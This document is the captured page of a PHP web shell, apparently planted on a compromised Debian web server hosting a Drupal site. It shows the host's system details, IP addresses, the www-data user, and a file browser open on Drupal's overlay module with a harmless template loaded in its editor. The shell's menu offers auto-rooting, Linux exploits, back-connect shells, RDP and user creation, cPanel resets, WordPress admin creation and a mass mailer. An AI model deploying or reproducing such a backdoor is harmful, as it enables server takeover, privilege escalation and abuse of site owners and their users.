Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.190.239.38
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
overlay /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
overlay-child-rtl.css
571
B
-rw-r--r--
overlay-child.css
3.27
KB
-rw-r--r--
overlay-child.js
6.54
KB
-rw-r--r--
overlay-parent.css
1.1
KB
-rw-r--r--
overlay-parent.js
37.55
KB
-rw-r--r--
overlay.api.php
1.03
KB
-rw-r--r--
overlay.info
261
B
-rw-r--r--
overlay.install
480
B
-rw-r--r--
overlay.module
35.14
KB
-rw-r--r--
overlay.tpl.php
1.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : overlay.tpl.php
<?php /** * @file * Default theme implementation to display a page in the overlay. * * Available variables: * - $title: the (sanitized) title of the page. * - $page: The rendered page content. * - $tabs (array): Tabs linking to any sub-pages beneath the current page * (e.g., the view and edit tabs when displaying a node). * * Helper variables: * - $classes_array: Array of html class attribute values. It is flattened * into a string within the variable $classes. * * @see template_preprocess() * @see template_preprocess_overlay() * @see template_process() * * @ingroup themeable */ ?> <?php print render($disable_overlay); ?> <div id="overlay" <?php print $attributes; ?>> <div id="overlay-titlebar" class="clearfix"> <div id="overlay-title-wrapper" class="clearfix"> <h1 id="overlay-title"<?php print $title_attributes; ?>><?php print $title; ?></h1> </div> <div id="overlay-close-wrapper"> <a id="overlay-close" href="#" class="overlay-close"><span class="element-invisible"><?php print t('Close overlay'); ?></span></a> </div> <?php if ($tabs): ?><h2 class="element-invisible"><?php print t('Primary tabs'); ?></h2><ul id="overlay-tabs"><?php print render($tabs); ?></ul><?php endif; ?> </div> <div id="overlay-content"<?php print $content_attributes; ?>> <?php print $page; ?> </div> </div>
Close